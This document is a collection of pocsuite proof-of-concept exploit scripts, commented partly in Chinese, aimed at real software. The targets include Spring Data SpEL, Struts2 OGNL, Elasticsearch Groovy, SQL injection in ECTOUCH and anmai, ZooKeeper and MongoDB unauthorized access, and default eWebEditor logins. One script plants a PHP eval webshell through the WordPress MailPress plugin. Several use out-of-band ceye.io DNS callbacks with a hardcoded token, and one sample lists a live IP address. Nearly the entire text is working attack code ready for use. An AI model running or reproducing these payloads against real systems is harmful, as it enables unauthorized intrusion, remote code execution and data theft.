from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str
import json

class Spring(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2020-04-02'
    createDate = '2020-06-30'
    updateDate = '2020-06-30'
    references = ['']
    name = 'Spring Expression Language 远程代码漏洞'
    appPowerLink = 'https://oss.sonatype.org/'
    appName = 'Spring Expression Language'
    appVersion = 'Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10), Spring Data REST 2.6 - 2.6.10 (Ingalls SR10),Spring Data Commons 2.0 to 2.0.5 (Kay SR5),Spring Data REST 3.0 - 3.0.5 (Kay SR5)  '
    vulType = 'rce'
    desc = '''
    Spring Expression Language SpEL 远程代码漏洞 (CVE-2018-1273)
    '''

    def _verify(self):
        result = {}
        try:
            target = self.url + '/users'
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            payload = "username[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('%s')]=&password=&repeatedPassword=" % cmd2
            r = requests.post(target, data=payload, headers=self._headers)
            if r.status_code == 500:
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target
                    result['VerifyInfo']['Payload'] = payload
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            'Host': self.url,
            'Connection': "keep-alive",
            'Content-Length': "120",
            'Pragma': "no-cache",
            'Cache-Control': "no-cache",
            'Origin': self.url,
            'Upgrade-Insecure-Requests': "1",
            'Content-Type': "application/x-www-form-urlencoded",
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
            'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            'Referer': "http://localhost:8080/users?page=0&size=5",
            'Accept-Encoding': "gzip, deflate, br",
            'Accept-Language': "zh-CN,zh;q=0.9,en;q=0.8"
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Spring)


#!/usr/bin/env python
# coding: utf-8
import socket
import urlparse
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2018-12-25'
    createDate = '2018-12-25'
    updateDate = '2018-12-25'
    references = ['',]
    name = 'Apache ZooKeeper unauthorized access'
    appPowerLink = ''
    appName = 'zookeeper'
    appVersion = 'All'
    vulType = 'Unauthorized'
    desc = '''
    Apache Zookeeper安装部署之后默认情况下不需要身份认证，攻击者可通过该漏洞泄露服务器的敏感信息。
    '''

    def _verify(self):
        result = {}
        pr = urlparse.urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [2181,12181,22181]
        for port in ports:
            try:
                s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect((pr.hostname,port))
                s.send('envi')
                info = s.recv(4096)
                if 'zookeeper.version' in info:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname,port)
                    result['extra'] = {}
                    result['extra']['evidence'] = info.strip()
                    break
            except:
                #raise
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
import json
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'ECTOUCH_Core_2.7.2__SQL_Injection_Vulnerability sql injection Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://www.anquanke.com/post/id/169152']
    desc = '''ECTOUCH_Core_2.7.2__SQL_Injection_Vulnerability 前台存在sql注入'''

    vulDate = '2019-01-04'
    createDate = '2019-04-08'
    updateDate = '2019-04-08'

    appName = 'ectouch'
    appVersion = '2.7.2'
    appPowerLink = 'http://www.ectouch.cn'
    samples = ['re']

    
    def _attack(self):
        """attack mode"""
        result = {}
        payload1 = '/index.php?c=Exchange&a=asynclist_list&integral_max=1.0union select 1,version(),3,4,5,database(),7,8,9,10,11 order by goods_id asc%23'
        resp = req.get(self.url + payload1)
        time.sleep(2)
        resp_json = json.loads(resp.content)
        dbname1 = resp_json['list'][0]['exchange_integral']
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1
        return self.parse_output(result)

    def _verify(self):
        """verify mode"""
        result = {}
        payload1 = '/index.php?c=Exchange&a=asynclist_list&integral_max=1.0union select 1,version(),3,4,5,database(),7,8,9,10,11 order by goods_id asc%23' 
        resp = req.get(self.url + payload1)
        time.sleep(2)
        if resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)




#!/usr/bin/env python
# coding: utf-8

import urllib
import random
import string
from collections import OrderedDict
import re
from pocsuite.api.request import req  #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    PocName = 'elasticsearch_exec '
    vulID = '1'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = 'lyb'  #  PoC作者的大名
    vulDate = '2018/5/24'  #漏洞公开的时间,不知道就写今天
    createDate = '2018/5/24'  # 编写 PoC 的日期
    updateDate = '2018/5/24'  # PoC 更新的时间,默认和编写时间一样
    references = [
        'https://www.waitalone.cn/elasticsearch-exp.html']  # 漏洞地址来源,0day不用写
    name = 'elasticsearch 命令执行漏洞 PoC'  # PoC 名称
    appPowerLink = 'elasticsearch'  # 漏洞厂商主页地址
    appName = 'elasticsearch'  # 漏洞应用名称
    appVersion = '1.4.2'  # 漏洞影响版本
    vulType = 'Command Execution'  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        elasticsearch命令执行。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def _elastic(self,url,cmd):
        """
        Elastic search 命令执行函数
        漏洞详情:http://zone.wooyun.org/content/18915
        测试案例:请自行扫描9200端口的网站吧。
        """
        results = []
        elastic_url = url + '_search?pretty'
        exp = '{"size":1,"script_fields": ' \
              '{"iswin": {"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\")' \
              '.getRuntime().exec(\\"' + cmd + '\\").getText()","lang": "groovy"}}}'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        content = req.post(elastic_url, data=exp, headers=headers, timeout=10).content
        result = re.findall(re.compile('\"iswin\" : \[ "(.*?)" \]'), content)
        if result:
            results.append(result[0])
        return results
    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        cmd="whoami"
        if self.url[-1] != '/': self.url += '/'
        elastic_url = self.url + '_search?pretty'
        exp = '{"size":1,"script_fields": ' \
              '{"iswin": {"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\")' \
              '.getRuntime().exec(\\"' + cmd + '\\").getText()","lang": "groovy"}}}'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        content = req.post(elastic_url, data=exp, headers=headers, timeout=10).content
        resp = re.findall(re.compile('\"iswin\" : \[ "(.*?)" \]'), content)
        if resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)



#!/usr/bin/env python
# code:utf-8

import string
import random
import hashlib
import base64
import urlparse
import urllib
import re


from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '92083'  # ssvid
    version = 'beta'
    author = ['C1tas']
    vulDate = '2016-7-11'
    createDate = '2016-7-11'
    updateDate = '2016-7-11'
    references = ['https://www.seebug.org/vuldb/ssvid-92083']
    name = 'WordPess-Plugin MialPress Remote Code Execution'
    appPowerLink = 'http://wordpress.org'
    appName = 'Wordpress-Plugin MialPress'
    appVersion = '<=5.4.3'
    vulType = 'Remote Code Execution'
    desc = '''
        Wordpress-Plugin MialPress Execution
    '''
    samples = ['']
    install_requires = ['']
    

    def _attack(self):
        result = {}
        flag = ''.join([random.choice(string.digits) for _ in range(8)])
        flag_hash = hashlib.md5(flag).hexdigest()
        exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
        post_data = {
            'action':'autosave',
            'id':'0',
            'revision':'-1',
            'to_list':'1',
            'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>',
            'mail_format':'standard',
            'autosave':'1'
        }

        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':    
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        
        vul_url = self.url + '/' + exp_url
        base_rep = req.post(vul_url,data=post_data)
        getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I)
        tmpid = getid[0].split("'")[1]
        
        while int(tmpid) > 0:
            shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid
            rep = req.get(shell_url)
            
            if flag_hash in rep.content:

                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
            
            break
            

        return self.parse_output(result)

    def _verify(self):
        result={}
        flag = ''.join([random.choice(string.digits) for _ in range(8)])
        flag_hash = hashlib.md5(flag).hexdigest()
        exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
        post_data = {
            'action':'autosave',
            'id':'0',
            'revision':'-1',
            'to_list':'1',
            'subject':'<?php echo md5('+flag+');?>',
            'mail_format':'standard',
            'autosave':'1'
        }

        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':    
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        
        vul_url = self.url + '/' + exp_url
        base_rep = req.post(vul_url,data=post_data)
        getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I)
        tmpid = getid[0].split("'")[1]
        
        while int(tmpid) > 0:
            verify_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid
            rep = req.get(verify_url)
            
            if flag_hash in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url

                break

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str

class Struts2(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2018-08-24'
    createDate = '2020-07-01'
    updateDate = '2020-07-01'
    references = ['']
    name = 'Apache Struts2 远程代码执行漏洞 (S2-032/CVE-2016-3081)'
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Struts2'
    appVersion = 'Struts 2.x < 2.3.20.2, Struts 2.3.28.x < 2.3.28.1, Struts 2.3.24.x < 2.3.24.2'
    vulType = 'rce'
    desc = '''
    Apache Struts2 远程代码执行漏洞 (S2-032/CVE-2016-3081)
    '''

    def _verify(self):
        result = {}
        try:
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            payload = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd="+cmd2+"&pp=____A&ppp=%20&encoding=UTF-8"
            target = self.url + payload
            r = requests.get(target, headers=self._headers)
            if r.status_code == 200 :
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Payload'] = payload
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Struts2)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '62352'  # ssvid
    version = '1.0'
    author = ['']
    vulDate = '2013-04-23'
    createDate = '2016-03-07'
    updateDate = '2016-03-07'
    references = ['http://www.seebug.org/vuldb/ssvid-62352']
    name = 'eWebEditor 弱密码漏洞'
    appPowerLink = 'http://www.ewebeditor.net/'
    appName = 'eWebEditor'
    appVersion = 'ALL'
    vulType = 'Weak Password'
    desc = '''
    ewebeditor默认情况下， 可用弱口令登录，从而导致攻击者可据此信息进行后续攻击。
    '''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        paths = ["/admin_login.asp","/admin/ewebeditor/admin_login.asp", "/edit/admin_login.asp", "/ewebeditor/admin_login.asp", "/admin/login.php"]
        for path in paths:
            target = "%s%s?action=login&usr=admin&pwd=admin" % (self.url, path)
            res = req.get(target)
            if "admin_default.asp" in res.url and "href='admin_login.asp'" in res.content and "eWebEditor" in res.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = res.url

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase


#基础基类
class ActuaorPOC(POCBase):
    vulID = '58'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2019-03-20' #漏洞公开的时间,不知道就写今天

    author = '1uanWu' #  PoC作者的大名
    createDate = '2019-03-20'# 编写 PoC 的日期
    updateDate = '2019-03-20'# PoC 更新的时间,默认和编写时间一样
    references = 'https://xz.aliyun.com/t/2233'# 漏洞地址来源,0day不用写
    name = 'springboot Actuaor Unauthorized access'# PoC 名称
    appPowerLink = 'https://docs.spring.io'# 漏洞厂商主页地址
    appName = 'springboot Actuaor'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'Information Disclosure'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        springboot actuaor 配置不当，未授权访问漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass
        
    #验证模块 pocsuite -r 58-springboot-Actuator-unauthorized.py -u http://127.0.0.1 --verify
    def _verify(self):
        #调用指纹方法
        result = {}
        output = Output()
        payload = ['trace','env','health','info']
        for i in payload:
            vul_url  = '{}/{}'.format(self.url, i)
            try:
                resp = req.get(url=vul_url, timeout=3, verify=False)
                if resp.headers['Content-Type'] and 'application/json' in resp.headers['Content-Type'] and len(resp.content)> 500:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = vul_url
                    result['VerifyInfo']['Payload'] = 'path:/{}'.format(i)
                    break
            except Exception as e:
                pass
        print('[+]58 poc done')
        return self.save_output(result)
    #攻击模块
    def _attack(self):
        pass

    #输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

#注册类
register(ActuaorPOC)





#!/usr/bin/env python
# -*- coding:utf-8 -*-

import socket
import urlparse

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = 'ssvid-88997'
    version = '1'
    author = ['Anonymous']
    vulDate = '2015-10-26'
    createDate = '2015-10-26'
    updateDate = '2015-10-26'
    references = ['']
    name = 'Mongodb 未授权访问 PoC'
    appPowerLink = 'https://www.mongodb.org/'
    appName = 'Mongodb'
    appVersion = 'All'
    vulType = 'Unauthorized access'
    desc = '''
        Mongodb 配置不当导致不需要密码即可访问，黑客直接访问即可获取数据库中所有信息，造成严重的信息泄露。
    '''

    samples = ['']

    def _verify(self):
        result = {}
        payload = "\x3F\x00\x00\x00\x7E\x00\x00\x00\x00\x00\x00\x00\xD4\x07\x00\x00\x04\x00\x00\x00\x61\x64\x6D\x69\x6E\x2E\x24\x63\x6D\x64\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x18\x00\x00\x00\x10\x6C\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
        s = socket.socket()
        socket.setdefaulttimeout(10)
        try:
            self.url = self.url.strip("http://")
            host = self.url.split(":")[0]
            port = int(self.url.split(":")[1])
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and 'local' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Port'] = port
                return self.parse_attack(result)
        except:
            pass
        s.close()
        url_p = urlparse.urlparse(self.url)
        url = "%s://%s:%s" % (url_p.scheme, url_p.netloc, str(port + 1000))
        resp = req.get(url)
        if resp.status_code == 200 and 'db version' in resp.content and 'sys info' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urljoin
from pocsuite.api.request import req
class TestPOC(POCBase):
    vulID = '98093'
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2019-10-24'
    createDate = '2019-10-25'
    updateDate = '2019-10-25'
    references = ['https://www.seebug.org/vuldb/ssvid-98093']
    name = '泛微 E-cology OA 数据库配置信息泄露漏洞'
    appPowerLink = 'https://www.weaver.com.cn/ecology/'
    appName = '泛微'
    appVersion = 'E-cology OA V9 V8'
    vulType = '信息泄露'
    desc = '''
    泛微 e-cology OA 系统曝出数据库信息泄露漏洞。如果攻击者 可直接访问数据库，则可直接获取用户数据，甚至可以直接控制数据库服务器。

    '''
    samples = ['http://42.243.25.75:8082/mobile/DBconfigReader.jsp']
    install_requires = ['']


    def _verify(self):
        result = {}
        base_url = self.url
        target = urljoin(base_url,'mobile/DBconfigReader.jsp')
        resp = req.get(target)
        if resp.status_code == 200 and "=" in resp.text and len(resp.text)<=100:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['抽烟的2b青年']
    vulDate = ''
    createDate = '2016-01-12'
    updateDate = '2016-01-12'
    references = ['http://www.sebug.net/vuldb/ssvid-']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = '''
    '''
    samples = ['']

    def _attack(self):
        result = {}
        #Write your code here
        hdr = '"' #start syntax
        hcr = "R3Z4" #user
        oth = ',"' #user
        oth2 = '","",""' #user
        val=','
        crash = "\x41"*199289 #B0F
        exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2
        file = open("r3z4.csv", "w")
        file.write(exp)
        file.close()
        return self.parse_output(result)

    def _verify(self):
        result = {}
        #Write your code here

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str

class Struts2(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2018-08-24'
    createDate = '2020-07-01'
    updateDate = '2020-07-01'
    references = ['']
    name = 'Apache Struts2 远程代码执行漏洞 (S2-052/CVE-2017-5638)'
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Struts2'
    appVersion = 'Struts2.5 – Struts2.5.12'
    vulType = 'rce'
    desc = '''
    Apache Struts2 远程代码执行漏洞 (S2-052/CVE-2017-5638)
    '''

    def _verify(self):
        result = {}
        try:
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            header = self._headers(cmd2)
            r = requests.get(self.url, headers=header)
            if r.status_code == 200 :
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Payload'] = cmd2
        except:
            pass
        return self.parse_output(result)

    def _headers(self, cmd):
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type":"%{(#dm='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Struts2)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'anmai ZJ_Manage sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=108502']
    desc = '''anmai   ZJ_Manage  打包'''

    vulDate = '2015-07-20'
    createDate = '2019-04-12'
    updateDate = '2019-04-12'

    appName = 'anmai'
    appVersion = '正式版'
    appPowerLink = 'http://www.anmai.net/'
    samples = ['re']

    url_list = ['/ZJ_Manage/Work_Man_Particular.aspx?id=1',
                '/ZJ_Manage/Class_ZjWork/Work_Plan_Particular.aspx?id=1',
                '/ZJ_Manage/Class_ZjWork/Work_Log_Particular.aspx?id=1',
                '/ZJ_Manage/Class_ZjWork/Importance_Events_Particular.aspx?id=1',
                '/ZJ_Manage/Class_ZjWork/AwardAndPunishRecord_Particular.aspx?id=1',
                '/ZJ_Manage/Zj_Record/Class_Comparison_Particular.aspx?id=1',
                '/ZJ_Manage/Zj_Record/Glory_Apply_Particular.aspx?id=1',
                '/ZJ_Manage/Zj_Record/OnDuty_ClassComparison_Particular.aspx?id=1',
                '/ZJ_Manage/Zj_Record/Server_Feedback_Particular.aspx?id=1',
                '/ZJ_Manage/Zj_Record/Zj_Record_Particular.aspx?id=1']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        for i in self.url_list:
            url = self.url.strip('/') + i
            payload = "+and+1=%28SELECT%20%20char%28126%29%2bDB_NAME()%2bchar%28126%29%29--+"
            url_p = url + payload
            resp = s.get(url_p)
            dbname = re.search('~(.*?)~', resp.content)
            if dbname:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['Database'] = {}
                result['Database']['DBname'] = dbname.group(1)
                break
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        result['VerifyInfo'] = {}
        j = 0
        for i in self.url_list:
            url = self.url.strip('/') + i
            payload = "+and+1=%28SELECT%20%20CHAR%28115%29%2bCHAR%28104%29%2bCHAR%28117%29%2bCHAR%2890%29%2bCHAR%2873%29%2bCHAR%28103%29%2bCHAR%28117%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2888%29%2bCHAR%2873%29%2bCHAR%2878%29%2bCHAR%2871%29%29--+"
            url_p = url + payload
            resp = s.get(url_p)
            time.sleep(0.5)
            if 'shuZIguanXING' in resp.content:
                result['VerifyInfo']['URL'+str(j)] = url
                j += 1
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

